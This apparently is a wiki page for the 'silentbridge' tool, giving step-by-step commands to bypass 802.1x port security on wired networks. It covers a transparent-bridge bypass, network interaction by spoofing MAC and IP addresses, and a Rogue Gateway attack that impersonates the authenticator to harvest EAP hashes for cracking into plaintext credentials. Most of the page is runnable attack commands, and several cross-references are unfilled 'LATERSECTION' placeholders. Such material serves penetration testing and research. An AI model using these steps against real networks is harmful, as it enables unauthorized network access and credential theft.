-
Notifications
You must be signed in to change notification settings - Fork 40
Rogue Gateway Attack
Effective against: 802.1x-2004, 802.1x-2001
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001 without any of the extra hardware mojo described in LATERSECTION.
Begin connecting your rogue device between the supplicant and authenticator as described in LATERSECTION.
Then, connect to your device using your side channel (see: LATERSECTION).
If you are using the LATERLINKTODevice Configuration BSECTION, make sure both splitters are in the "connect" position by running the --splitterctl command:
skip this if you are not using Device Configuration B
./silentbridge --splitterctl --upstream-splitter connect --phy-splitter connect
Next, use the --create-bridge command to create a simple transparent bridge:
substitute eno1, eno2, and eno3 for the names of your upstream, PHY, and sidechannel interfaces
./silentbridge --create-bridge --upstream eno1 --phy eno2--sidechannel eno3
That's it - you've just bypassed port security. You should be able to sniff traffic traveling to and from the supplicant.
Now that we've performed our initial bypass, let's give ourselves the capability to interact with devices on the network.
First, use tcpdump to gather the following data points:
- MAC address of default gateway
- IP address of supplicant
- MAC address of supplicant
- MAC address of switch
Then, use the --add-interaction flag to add network interaction to your bridge:
replace the interface names, IPs, and MAC addresses below with the data gathered using tcpdump
./silentbridge --add-interaction --gw-mac d0:17:c2:3f:af:e0 --client-ip 192.168.1.81 --upstream eno1 --client-mac 38:60:32:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:09:85 --sidechannel eno3
Congrats - you can now interact with anything on the network except the supplicant.
Effective against: 802.1x-2010 (Device Configuration B only), 802.1x-2004, 802.1x-2001
In a Rogue Gateway attack, the attacker impersonates the authenticator in order to force the supplicant to perform EAP authentication with the attacker. This provides the attacker with a set of hashes that can be cracked to obtain plaintext credentials. These plaintext credentials can then be used to authenticate with the network using the Bait n Switch attack, effectively bypassing port-security without using a bridge.
When used with Device Configuration B, the Rogue Gateway Attack can be used to bypass 802.1x-2010 cases where weak EAP methods are used (note that this has not been tested against MACsec implemented with PSK).
Begin connecting your rogue device between the supplicant and authenticator as described in LATERSECTION.
Next, connect to your device using your side channel (see: LATERSECTION).
Then, follow the instruction set below that is relevant to your device's configuration:
Begin by performing a classic 802.1x bypass as described in LATERSECTION.
Then, use tcpdump to passively sniff the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1
When finished, hit CTRL+C to terminate the attack. Then use the --bridge-up command to restore the classic 802.1x bypass:
./silentbridge --bridge-up
Begin by using the --splitterctl command to make sure that both splitters are in the "bypass" position:
./silentbridge --splitterctl --upstream-splitter bypass --phy-splitter bypass
Next, use tcpdump to sniff traffic on the interfaces connected to the device's passive tap. Gather the following data points:
- supplicant MAC address
- switch MAC address
- subnet netmask
- gateway IP
Then, use the --rogue-gateway command to perform the rogue gateway attack:
./silentbridge --rogue-gateway --upstream eno1 --client-mac 38:60:77:d0:ef:0b --phy eno2 --switch-mac 00:42:5a:87:57:85 --netmask 255.255.255.0 --gw-ip 192.168.1.1 --use-splitters
When finished, hit CTRL+C to terminate the attack.